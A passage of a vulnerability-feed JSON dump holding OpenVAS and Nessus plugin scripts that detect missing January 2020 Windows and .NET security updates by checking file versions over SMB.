Vulnerabilities (KB4534306)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815745\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0614\",\n \"CVE-2020-0613\", \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\",\n \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\",\n \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\",\n \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\",\n \"CVE-2020-0646\", \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:03:19 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534306)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534306\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in memory.\n\n - Microsoft Cryptographic Services improperly handles files.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Windows Common Log File System (CLFS) driver improperly handles objects\n in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privilges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534306\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18452\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18452\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534276", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815740", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534276)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815740\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0640\", \"CVE-2020-0605\",\n \"CVE-2020-0646\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:48:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534276)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534276\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Windows Common Log File System (CLFS) driver fails to properly handle\n objects in memory.\n\n - Windows Search Indexer handles objects in memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges,\n disclose sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534276\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1624\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1624\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534293", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815744", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815744", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534293)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815744\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\", \"CVE-2020-0646\",\n \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:01:33 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534293)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534293\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges, disclose\n sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please\n see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534293\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1245\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1245\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0609", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0612", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534271", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815742", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534271)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815742\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0612\", \"CVE-2020-0615\",\n \"CVE-2020-0617\", \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0609\",\n \"CVE-2020-0610\", \"CVE-2020-0611\", \"CVE-2020-0614\", \"CVE-2020-0613\",\n \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\", \"CVE-2020-0626\",\n \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\", \"CVE-2020-0630\",\n \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0633\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0637\", \"CVE-2020-0639\", \"CVE-2020-0644\",\n \"CVE-2020-0641\", \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\",\n \"CVE-2020-0646\", \"CVE-2020-0640\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:57:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534271)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534271\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - win32k component improperly provides kernel information.\n\n - Microsoft Windows Graphics Component improperly handles objects in\n memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Remote Desktop Web Access improperly handles credential information.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privilges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534271\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3442\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3442\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-03-27T10:29:17", "description": "The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)", "edition": 5, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "title": "Security Updates for Microsoft .NET Framework (January 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-16T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS20_JAN_DOTNET.NASL", "href": "https://www.tenable.com/plugins/nessus/132999", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132999);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\"CVE-2020-0605\", \"CVE-2020-0606\", \"CVE-2020-0646\");\n script_xref(name:\"MSKB\", value:\"4532935\");\n script_xref(name:\"MSKB\", value:\"4535101\");\n script_xref(name:\"MSKB\", value:\"4535103\");\n script_xref(name:\"MSKB\", value:\"4535102\");\n script_xref(name:\"MSKB\", value:\"4535105\");\n script_xref(name:\"MSKB\", value:\"4535104\");\n script_xref(name:\"MSKB\", value:\"4532933\");\n script_xref(name:\"MSKB\", value:\"4534271\");\n script_xref(name:\"MSKB\", value:\"4532938\");\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSKB\", value:\"4534977\");\n script_xref(name:\"MSKB\", value:\"4534976\");\n script_xref(name:\"MSKB\", value:\"4532936\");\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSKB\", value:\"4534979\");\n script_xref(name:\"MSKB\", value:\"4534978\");\n script_xref(name:\"MSFT\", value:\"MS20-4532935\");\n script_xref(name:\"MSFT\", value:\"MS20-4535101\");\n script_xref(name:\"MSFT\", value:\"MS20-4535103\");\n script_xref(name:\"MSFT\", value:\"MS20-4535102\");\n script_xref(name:\"MSFT\", value:\"MS20-4535105\");\n script_xref(name:\"MSFT\", value:\"MS20-4535104\");\n script_xref(name:\"MSFT\", value:\"MS20-4532933\");\n script_xref(name:\"MSFT\", value:\"MS20-4534271\");\n script_xref(name:\"MSFT\", value:\"MS20-4532938\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534977\");\n script_xref(name:\"MSFT\", value:\"MS20-4534976\");\n script_xref(name:\"MSFT\", value:\"MS20-4532936\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534979\");\n script_xref(name:\"MSFT\", value:\"MS20-4534978\");\n script_xref(name:\"IAVA\", value:\"2020-A-0028\");\n\n script_name(english:\"Security Updates for Microsoft .NET Framework (January 2020)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft .NET Framework installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\");\n # https://support.microsoft.com/en-us/help/4532935/kb4532935-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71a4b34c\");\n # https://support.microsoft.com/en-us/help/4535101/kb4535101-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dd1d619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535103/kb4535103\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535102/kb4535102\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535105/kb4535105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535104/kb4535104\");\n # https://support.microsoft.com/en-us/help/4532933/kb4532933-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d6758a7c\");\n # https://support.microsoft.com/en-us/help/4534271/windows-10-update-kb4534271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e147f537\");\n # https://support.microsoft.com/en-us/help/4532938/kb4532938-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f331705\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534977/kb4534977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534976/kb4534976\");\n # https://support.microsoft.com/en-us/help/4532936/kb4532936-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4bff0836\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534979/kb4534979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534978/kb4534978\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft .NET Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 